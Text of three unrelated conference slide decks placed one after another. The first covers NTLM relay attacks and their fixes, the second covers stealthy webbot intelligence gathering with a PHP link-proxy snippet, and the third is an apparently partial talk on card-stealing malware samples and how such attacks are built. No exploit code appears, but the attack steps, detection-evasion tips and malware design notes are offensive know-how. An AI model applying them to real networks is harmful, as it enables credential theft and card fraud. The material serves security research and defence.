• Among his team latest finding are CVE-2017-8563, CVE-2018-0886, CVE-2019-
1040 and CVE-2019-1019
Yaron Zinar (@YaronZi)
AGENDA
1. Introduction:
§ Common attacks on Active
Directory
§ NTLM
§ Design weaknesses
§ NTLM Relay
§ Offered mitigations
2. Known Vulnerabilities
§ LDAPS Relay
§ CVE-2015-0005
3. New vulnerabilities
§ Your session key is my session
key
§ Drop the MIC
§ EPA bypass
§ Attacking AD FS
§ External lockout bypass
§ Reverse-Kerberoasting
4. Takeaways
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
INTRODUCTION: ACTIVE DIRECTORY
§ Main secrets storage of the domain
§ Stores password hashes of all accounts
§ In charge of authenticating accounts against domain resources
§ Authentication protocols
§ LDAP
§ NTLM
§ Kerberos
§ Common attacks
§ Golden & Silver Ticket
§ Forged PAC
§ PTT
§ PTH
§ NTLM Relay
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM
Authentication is not bound to the session!
(1) NTLM Negotiate
(3) NTLM Authenticate
(2) NTLM Challenge
(4) NETLOGON
(5) Approve/Reject
Client Machine
Server
DC
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
Server
Attacked
Target
DC
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY:
MITIGATIONS
NTLM RELAY: MITIGATIONS
§ Mitigations:
§ SMB Signing
§ LDAP Signing
§ EPA (Enhanced Protection for Authentication)
§ LDAPS channel binding
§ Server SPN target name validation
§ Hardened UNC Paths
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY: MITIGATIONS
§ SMB & LDAP signing
§ After the authentication, all communication between client and server will
be signed
§ The signing key is derived from the authenticating account’s password hash
§ The client calculates the session key by itself
§ The server receives the session key from the DC in the NETLOGON
response
§ An attacker with relay capabilities has no way of retrieving the session key
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY: MITIGATIONS
§ SMB & LDAP signing
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client
Machine
DC
Server
Attacked
Target
Packet not
signed
correctly
+Session Key
(Hash Derived)
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY: MITIGATIONS
§ EPA (Enhanced Protection for Authentication)
§ RFC 5056
§ Binds the NTLM authentication to the secure channel over which the
authentication occurs
§ The final NTLM authentication packet contains a hash of the target service’s
certificate, signed with the user’s password hash
§ An attacker with relay capabilities is using a different certificate than the
attacked target, hence the client will respond with an incompatible
certificate hash value
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY: MITIGATIONS
§ EPA (Enhanced Protection for Authentication)
(2) NTLM Negotiate
Client
Machine
DC
Server
Attacked
Target
(5) NTLM Challenge
(6) NTLM Authenticate
User signs the Server’s
certificate
Incorrect
certificate hash!
(1) TLS Session
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY:
KNOWN VULNERABILITIES
NTLM: KNOWN VULNERABILITIES
§ LDAPS Relay (CVE-2017-8563)
§ Discovered by Preempt in 2017
https://blog.preempt.com/new-ldap-rdp-relay-vulnerabilities-in-ntlm
§ Group Policy Object (GPO) - “Domain Controller: LDAP server signing
requirements”
§ Requires LDAP sessions to be signed OR
§ Requires session to be encrypted via TLS (LDAPS)
§ TLS does not protect from credential forwarding!
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ Discovered by Core Security (@agsolino)
§ DC didn’t verify target server identity
§ Allows NTLM Relay even when Signing is required
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
DC
Server
Attacked
Target
(9) NETLOGON
(10) Approve + Session Key
+Session Key
(Hash Derived)
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ NTLM Challenge message:
§ Contains identifying information about the target computer
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ NTLM Authenticate message:
§ User calculates HMAC_MD5 based on the challenge message using his NT Hash
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005 – Fix:
§ Microsoft issued a fix in MS15-027
§ The fix validated that the computer
which established the secure
connection is the same as the target
in the NTLM Authenticate request
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
DC
Server
Attacked
Target
(9) NETLOGON
(10) DENY!
+Session Key
(Hash Derived)
Target hostname
mismatch!
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM RELAY:
NEW VULNERABILITIES
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ Retrieve the session key for any NTLM authentication
§ Bypasses the MS15-027 fix
§ Drop the MIC
§ Modify session requirements (such as signing)
§ Overcome the MIC protection
§ EPA bypass
§ Relay authentication to servers which require EPA
§ Modify packets to bypass the EPA protection
§ Attacking AD-FS
§ External lockout policy bypass
§ Reverse-Kerberoasting
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
YOUR SESSION KEY IS MY
SESSION KEY
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ MS15-027 fix validates target NetBIOS name
§ But what is the target NetBIOS name field is missing?
Original challenge:
Modified challenge:
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ The client responds with an NTLM_AUTHENTICATE message with target
NetBIOS field missing
§ The NETLOGON message is sent without this field
§ The domain controller responds with a session key!
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ But what if the NTLM AUTHENTICATE message includes a MIC?
§ MIC: Message integrity for the NTLM NEGOTIATE, NTLM CHALLENGE, and
NTLM AUTHENTICATE
§ MIC = HMAC_MD5(SessionKey, ConcatenationOf(
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE))
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ Overcoming the MIC problem:
§ By removing the target hostname we are able to retrieve the session key
§ We have all 3 NTLM messages
§ The client provides a MIC which is based on the modified NTLM_CHALLENGE
message
§ We recalculate the MIC based on the original NTLM_CHALLENGE message
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
remove target name
Client Machine
DC
Server
Attacked
Target
(6) NETLOGON
(7) Approve + Session Key
+Session Key
(Hash Derived)
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key – Fix:
§ Windows servers deny requests which do not include a target
§ Issues:
§ NTLMv1
§ messages do not have av_pairs -> no target field
§ Such authentication requests remain vulnerable to the attack
§ Non-Windows targets are still vulnerable
§ Patching is not enough
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
DROP THE MIC
NTLM: NEW VULNERABILITIES
§ Drop the MIC
§ MIC = HMAC_MD5(SessionKey, ConcatenationOf(
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE))
§ If client & server negotiate session privacy/integrity, attackers cannot take
over the session
§ The MIC protects the NTLM negotiation from tampering
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Drop the MIC
§ SMB clients turn on the signing negotiation flag by default & use a MIC
§ It is not possible (or at least, not trivial) to relay SMB to another protocol which
relies on this negotiation flag (in contrast to other protocols such as HTTP)
§ How can we overcome this obstacle?
§ MIC can be modified only if the session key is known
§ Otherwise, it can be simply removed J
§ [In order to remove the MIC, the version needs to be removed as well, as well as
some negotiation flags]
§ Result: It is possible to tamper with any stage of the NTLM authentication flow
when removing the MIC
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Drop the MIC
(1) NTLM Negotiate
Signing supported
(5) NTLM Authenticate
Includes MIC
(4) NTLM Challenge
No signing negotiated
Client Machine
Server
Attacked
Target
DC
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Drop the MIC - Problem
§ The MIC presence is notified in the msvAvFlags attribute in the NTLM
authentication message
§ msvAvFlags is signed with the user’s password hash
§ Even if the corresponding bit is set, the target server does not verify that the
MIC is indeed present
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ MIC bypass - Fix:
§ If msvAvFlags indicate that a MIC is present, verify its presence.
§ Issues:
§ Some clients don’t add a MIC by default (Firefox on Linux or MacOS)
§ These clients are still vulnerable to NTLM session tampering
§ More serious issue:
CVE-2019-1166 –
Drop The MIC 2 J
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
EPA BYPASS
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
§ EPA binds authentication
packets to a secure TLS channel
§ Adds a Channel Bindings field
to the NTLM_AUTHENTICATE
message based on the target
server certificate
§ Prevents attackers from relaying
the authentication to another
server
§ Modification requires
knowledge of the user’s NT
HASH
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
§ Servers protected by EPA:
§ AD-FS
§ OWA
§ LDAPS
§ Other HTTP servers (e.g. Sharepoint)
§ Unfortunately by default, EPA is disabled on all of the above servers
§ In most cases, these servers are vulnerable to much simpler attack vectors
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
§ Modifying the Channel Bindings
in the NTLM_AUTHENTICATE
message is not possible
§ But what if we add a Channel
Bindings field to the
NTLM_CHALLENGE message
before we send it to the client?
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
§ Client will add our crafted field
to the NTLM_AUTHENTICATE
message!
§ Additional fields would be
added to the message, including
a second Channel Binding
§ Server takes the first Channel
Binding for verification
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
§ What if the NTLM_AUTHENTICATE message includes a MIC?
§ DROP THE MIC!
Original NTLM_AUTHENTICATE:
Modified NTLM_AUTHENTICATE:
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA (Enhanced Protection for Authentication) bypass
(1) NTLM Negotiate
DC
Server
Attacked
Target
(4) NTLM Challenge
Inject Channel Binding
(5) NTLM Authenticate
Rouge Channel Binding
MIC
Client Machine
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ EPA bypass - Fix:
§ Servers deny authentication requests which include more than one
channel binding value
§ Issues:
§ Some clients don’t support EPA & don’t add a MIC (Firefox on Linux or
MacOS)
§ These clients are still vulnerable to the EPA bypass
§ One such client is enough to make the entire domain vulnerable
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
ATTACKING AD-FS
ATTACKING AD-FS
§ AD-FS Architecture
https://www.sherweb.com/blog/office-365/active-directory-federation-services/
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
ATTACKING AD-FS
§ AD-FS Proxy
§ Open to the internet
§ Easy target for brute-force/password spraying attacks
§ External Lockout Policy
§ Locks the user coming from the external network after exceeding the
Extranet Lockout Threshold
§ Has effect when: Extranet Lockout Threshold < AD Lockout Threshold
§ Prevents brute-force-attacks
§ Prevents malicious account lockouts
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
ATTACKING AD-FS
§ WIA (Windows Integrated Authentication)
§ Use Kerberos or NTLM SSO capabilities to authenticate to AD-FS
§ WIA authentications were accepted by the AD-FS proxy
§ NTLM relay against the AD-FS proxy from the external network
§ NTLM authentications target at the AD FS proxy allowed attackers to bypass
the external lockout policy (CVE-2019-1126)
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
ATTACKING AD-FS
§ WIA (Windows Integrated Authentication)
§ Kerberos authentications allowed attackers to brute-force the AD-FS service
account’s password
§ Generate service tickets using different passwords and send to AD-FS proxy
§ If password is successfully guessed -> log into cloud resources using any
desired privileges
§ No logs generated for unsuccessful attempts
§ Reverse-Kerberoasting!
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
TAKEAWAYS
TAKEAWAYS
§ Patch all vulnerable machines!
§ Restrict NTLM usage as much as possible
§ NTLM authentication is susceptible to NTLM relay attacks
§ Always prefer Kerberos usage
§ Disable NTLMv1 in your environment
§ Configure the GPO ‘Network security: LAN Manager authentication level’ to:
‘Send NTLMv2 response only. Refuse LM & NTLM’
§ https://docs.microsoft.com/en-us/windows/security/threat-protection/security-
policy-settings/network-security-lan-manager-authentication-level
§ Incorporate NTLM relay mitigations:
§ SMB & LDAP signing
§ LDAP channel binding
§ EPA
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
CREDITS
§ The Preempt Research Team
§ Eyal Karni (@eyal_karni)
§ Sagi Sheinfeld
§ Alberto Solino (@agsolino)
§ Some of the vulnerabilities are merged into impacket!
§ https://github.com/SecureAuthCorp/impacket
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
THANK YOU! | pdf |
What we'll cover
How online intelligence gathering differs from
traditional intelligence gathering
The difference between intelligence and
espionage
Corporate “Dash boards”
Tips from the field
Opportunities for the community
Who am I?
[email protected]
Minneapolis-based consultancy:
Michael Schrenk Ltd. (www.schrenk.com)
Write Webbots and Spiders for corporate clients
DEFCON X, “Introduction to Writing Spiders
and Web Agents”.
Also write, speak and teach
Intelligence = Information
In a business sence, you want to know:
What can you learn about your competition?
What do people know about you?
Are people stealing from you?
The most important thing is...
What can you predict?
Collect library of information
Compare changes
Definitions
Intelligence is not necessarily:
Espionage
spying,
launching trojans
Wiretapping
A covert action
Tampering with a situation to change
A Strategy
An Election
Traditional sources for
collecting corporate intel
Go to conferences,
Hire your competition's employees,
Lookup patent records,
Use secret shoppers,
Study help wanted ads,
Read trade publications,
Talk to vendors
Disadvantages of
Traditional corporate intel
Mostly after-the-fact
Requires contact
Mostly one-time activities—must be repeated
Cannot be done anonymously
Can be expense
Gathering online intel
means learning new habits
Web agents determine how you use the Internet
Browsers
Mail clients
News readers
Telnet
Competitive advantages come when you
perform better and differently.
Webbots/Spiders
Advantages of online
corporate intelligence
Can be done from a distance (with stealth)
Can be automated
Can be done anonymously (for the most part)
Reduces or eliminates latency between when an event
happens and a decision can be made
Can be interactive
Can create relevance that traditional
methods cannot
Online Corporate Intel most
effective when...
It is automated
Data can be parsed and stored in a database
Stores data over a period of time
Creates context by combining various data from a
variety of sources
Uses statistical analysis to make
recomendations
Allows user to configure
Creating relevance
Cross reference multiple sources
Gathter information periodically over time
Trend analysis
Show relationships between data
Online intelligence applications can
automate the evaluation process
(Some) sources for
online intelligence
Corporate web sites
Job postings
Product pricing
News
Government web sites
Court records
SEC filings
Patent records
Census data
(More) sources for online
intelligence
Online auctions
– What's a good buy?
– What's a good selling price?
Whois servers
News servers
HTTP headers
Mail
Technology
(the basics of collecting and
using intelligence in three steps)
Identify sources, write bots and
store data
Write a data-driven web site
for the customer of the data
Create a scheduler for the
webbots and spiders
Simple examples
CopCorporate Intelligence
“Dashboards”
Provide “big picture” of data within some
defined context
Adds context to data
Filters
Statistics
Show trends
Creates branding opportunities
Mail example
(Are people stealing from you?)
Policing the Intenet
Problem:
People steal things and want to liquidate
them quickly.
Online auctions are an attractive
alternative to pawn shops.
Policing the Internet
(continued)
Solution:
Create an online interface that allows law
enforcement to enter groups of items
stolen at the same time and place.
Write webbots that looks for
individuals selling similar
groupings from similar places
on
online auctions.
What are people reading?
What are employess of
Apple Computer reading?
1. 1. Mac OS X in a nutshell
2. 2. Mac OS X Hacks
3. 3. Mac OS X: The Missing Manual
4. 4. Pattern Recognition
5. 5. Harry Potter and the Order of the Phoenix
6. 6. What should I do with My Life?
Interactive Intelligence
Sniping agents:
Software that places last-second bids on
online auctions.
Prevents the bidding process from raising
the auction prices.
Somewhat limited by proxy
bidding
Interactive Intelligence
Intelligent shopping software:
Webbots collect market information on
select items.
When an items meet criteria (determined
by collected market intelligence) those
items are either automatically
purchased or reccomended for
purchase.
Stocks, online auctions, etc.
Online Sources
Respect their bandwidth
Be as stealthy as you can
Tips on writing stealthy
bots and spiders
Treat bandwidth with respect
(But don't forget to download both HTML & images)
Introduce randomness
Change your start times
Randomize time periods between downloads
Randomize sequence of page downloads
Rotate IP addresses
Use a “link proxy:
Destroying the REFERER
Destroying the REFERER
Interfacing to the link proxy
Change links from:
<a
href=”https://www.some_online_resource.com/members/link.html”>
link
</a>
to:
<a href=”http:www.some_safe_pace.com/link_proxy.php?
url=https://www.some_online_resource.com/members/link.html”>
link
</a>
Link proxy code
<BASE
HREF="https://www.some_online_resource.com/members">
<?php
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_USERPWD, "username:password");
curl_setopt ($ch, CURLOPT_REFERER, "");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/7.01");
curl_exec ($ch);
curl_close ($ch);
?>
Thank you
(Q&A)
Mike Schrenk
[email protected]
www.schrenk.com | pdf |
DEF CON 18
Malware Freakshow 2
Nicholas J. Percoco & Jibran Ilyas
Copyright Trustwave 2010
Agenda
• About Us
• Introduction
• What’s a Malware Freakshow?
• Anatomy of a Successful Malware Attack
• Sample Analysis + Victim + Demo
• Sample SL2009-127 – Memory Rootkit Malware
• Sample SL2010-018 – Windows Credential Stealer
• Sample SL2009-143 – Network Sniffer Rootkit
• Sample SL2010-007 – Client-side PDF Attack
• Conclusions
Copyright Trustwave 2010
About Us
Nicholas
J.
Percoco
/
Senior
Vice
President
at
Trustwave
•
15
Years
in
InfoSec
/
BS
in
Computer
Science
•
Built
and
Leads
the
SpiderLabs
team
at
Trustwave
•
Interests:
− Targeted
Malware,
AFack
PrevenHon,
Mobile
Devices
•
Business
/
Social
Impact
Standpoint
Jibran
Ilyas
/
Senior
Security
Consultant
at
Trustwave
•
8
Years
in
InfoSec
/
Masters
in
Infotech
Management
from
Northwestern
University
•
Interests:
− AnHforensics,
ArHfact
Analysis,
Real
Hme
Defense
Copyright Trustwave 2010
Introduction
We
had
a
busy
year!!
•
Over
200
incidents
in
24
different
countries
•
Hundreds
of
Samples
to
pick
from
•
We
picked
the
most
interesHng
for
you
New
Targets
This
Year
•
Sports
Bar
in
Miami
•
Online
Adult
Toy
Store
•
InternaHonal
VoIP
Provider
•
US
Defense
Contractor
Malware
Developers
were
busy
upda@ng/improving
their
code
•
Many improvements to avoid detection
•
Maybe they saw our Freakshow last year
Copyright Trustwave 2010
What’s a Malware Freakshow?
We
have
access
to
breached
environments
•
These
environments
contain
valuable
data
•
Smash
and
Grab
is
old
school
•
AFackers
spend
average
of
156
before
geXng
caught
•
With
Hme,
comes
exploraHon
and
development
•
Custom
and
Targeted
Malware
is
the
Norm,
not
the
excepHon
•
Gather
and
perform
analysis
on
each
piece
of
Malware
−
A
Malware
Freakshow
demos
samples
to
the
security
community
−
Benefit:
Learn
the
sophis@ca@on
of
the
current
threats
−
Goal:
Rethink
the
way
we
alert
and
defend!!!
Copyright Trustwave 2010
Anatomy of a Successful Malware Attack
Malware
development
takes
a
methodical
approach
•
Step
1:
IdenHfying
the
Target
•
Step
2:
Developing
the
Malware
•
Step
3:
InfiltraHng
the
VicHm
•
Step
4:
Finding
the
Data
•
Step
5:
GeXng
the
Loot
Out
•
Step
6:
Covering
Tracks
and
ObfuscaHon
(opHonal)
Before
we
discuss
the
samples,
we’ll
cover
this
process.
Copyright Trustwave 2010
Anatomy – Step 1: Identifying the Target
Target
the
Data
that
will
lead
to
the
Money
•
Credit
Card
Data
− Exists
in
plain
text
in
many
type
of
environments
− Cash
is
just
4
hops
away
[Track
Data]-‐>[Fake
Card]-‐>[Fraud]-‐>[Sale
of
Goods]-‐>[Cash]
•
ATM/Debit
Card
Data
− Limited
to
only
ATM
Networks
and
places
accepHng
debit
− Need
PIN
as
well
− Cash
is
just
3
hops
away
[Track
Data+PIN]-‐>[Fake
Card]-‐>[ATM
Machine]-‐>[Cash]
Copyright Trustwave 2010
Anatomy – Step 2: Developing the Malware
Depends
on
the
Target
System,
but
focus
on
the
Big
Three
•
Keystroke
Logger
•
Network
Sniffer
•
Memory
Dumper
•
Disk
Parser?
Design
Considera@ons
•
Naming
ConvenHon
•
blabla.exe
–
not
the
best
name
choice
•
svchost.exe
–
much
beFer
•
FuncHonality
•
Slow
and
Steady
wins
the
race
•
Persistency
and
Data
Storage
Copyright Trustwave 2010
Anatomy – Step 3: Infiltrating the Victim
Three
basic
methods
of
plan@ng
your
malware:
•
The
Physical
Way
− “Hi,
I’m
Ryan
Jones.
Look
over
there.
pwned”
•
The
Easy
Way
− “Nice
to
meet
you
RDP
&
your
friend
default
password”
•
The
Über
Way
− 0days
− “Silent
But
Deadly”
Copyright Trustwave 2010
Anatomy – Step 4: Finding the Data
The
SoXware
Holds
the
“Secrets”
•
Task
Manager
− Busy
Processes
==
Data
Processing
•
Process’s
Folders
− Temp
Files
==
SensiHve
Data
•
Configura@on
Files
− Debug
Set
to
ON
==
Shields
Down
•
The
Wire
− Local
Network
Traffic
==
Clear
Text
Copyright Trustwave 2010
Anatomy – Step 5: Getting the Loot Out
Keep
It
Simple
Stupid
•
Li]le
to
no
egress
filtering,
doesn’t
mean
use
TCP
31337
•
Don’t
Reinvent
to
Wheel
− FTP
− HTTP
− HTTPS
− SMTP
•
IT/Security
Professional
Look
for
Freaks
− Traffic
on
high
ports
==
suspicious
Copyright Trustwave 2010
Anatomy – Step 6: Covering Tracks and Obfuscation
Don’t
Be
Clumsy
•
Test
the
Malware
First!
− Crashing
Systems
=
Sorta
Bad
− Filling
Up
Disk
Space
=
Real
Bad
− CMD
Popping
Up
=
Just
Stupid
Mess
with
the
Cops
•
MAC
Hmes
to
match
system
install
dates
•
Obfuscate
Output
file;
even
just
slightly
•
Pack
the
Bag
of
Tricks
•
Automate,
but
Randomize
Events
•
Rootkits
Copyright Trustwave 2010
Sample SL2009-127 – Memory Rootkit Malware
Vitals
Code
Name:
Capt.
Brain
Drain
Filename:
ram32.sys
File
Type:
PE
32-‐bit,
Kernel
Driver
Target
Plaborm:
Windows
Key
Features
•
Installs
malware
as
a
rootkit
to
stay
hidden
from
process
list
•
Checks
all
running
processes
in
kernel
for
track
data
•
Output
dumped
to
file
w/
“HIDDEN”
and
“SYSTEM”
aFributes
•
Character
subsHtuHon
in
output
file
to
avoid
detecHon
•
At
set
Hme
daily,
malware
archives
data
and
flushes
the
data
from
output
file
to
avoid
duplicaHon
of
stolen
data
Vic@m
Sports
Bar
in
Miami
•
An
elite
locaHon
that
aFracts
celebriHes
•
IT
operaHons
outsourced
to
Third
Party
•
Owner
throws
away
security
and
compliance
noHces
as
monthly
IT
expenses
“give
him
a
headache”.
•
POS
System
is
also
a
DVR
server
Copyright Trustwave 2010
Sample SL2009-127 – Memory Rootkit Malware
It’s Demo Time!
Copyright Trustwave 2010
Sample SL2010-018 – Windows Credential Stealer
Vitals
Code
Name:
Don’t
Call
Me
Gina
Filename:
fsgina.dll
File
Type:
Win32
Dynamic
Link
Library
Target
Plaborm:
Windows
Key
Features
•
Loads
with
Winlogon.exe
process
•
Changes
Windows
AuthenHcaHon
screen
to
a
“Domain
login”
screen.
•
Stores
stolen
credenHals
in
ASCII
file
on
system
•
Only
stores
successful
logins
•
AFempts
exporHng
logins
via
SMTP
to
an
email
address.
Vic@m
Online
Adult
Toy
Store
•
A
100
person
company
on
the
West
Coast
of
USA.
•
Outsourced
website
hosHng
and
dev
to
a
low
cost
provider
•
Admin
page
allows
uploads
of
files
•
Database
stores
card
data
for
10
minutes
post
transacHon
Copyright Trustwave 2010
Sample SL2010-018 – Windows Credential Stealer
Another Demo!
Copyright Trustwave 2010
Sample SL2009-143 – Network Sniffer Rootkit
Vitals
Code
Name:
ClandesHne
Transit
Authority
Filename:
winsrv32.exe
File
Type:
PE
32-‐bit
Target
Plaborm:
Windows
Key
Features
•
Components
of
malware
embedded
inside
it
-‐
Ngrep,
RAR
tool
and
Config
file
•
Uses
rootkit
to
hide
malware
from
Task
Manager
•
Ngrep
opHons
contains
Track
Data
regular
expression
•
At
the
end
of
the
day,
it
RARs
and
password
protects
the
temporary
output
file
and
creates
new
file
for
next
day.
•
Exports
compressed
and
password
protected
data
via
FTP
Vic@m
Interna@onal
VoIP
Provider
•
Seven
person
company
(~80,000
acHve
customers)
•
2
methods
of
payment:
website
or
kiosk
•
Data
Center
was
in
barn;
was
home
to
20
farm
cats
•
Payment
Switch
support
outsourced
to
3rd
party
Copyright Trustwave 2010
Sample SL2009-143 – Network Sniffer Rootkit
Demo #3!
Copyright Trustwave 2010
Sample SL2010-007 – Client-Side PDF Attack
Vitals
Code
Name:
Dwight’s
Duper
Filename:
Announcement.pdf
File
Type:
Portable
Document
Format
Target
Plaborm:
Windows
Key
Features
•
Malware
aFached
in
targeted
email
looks
to
be
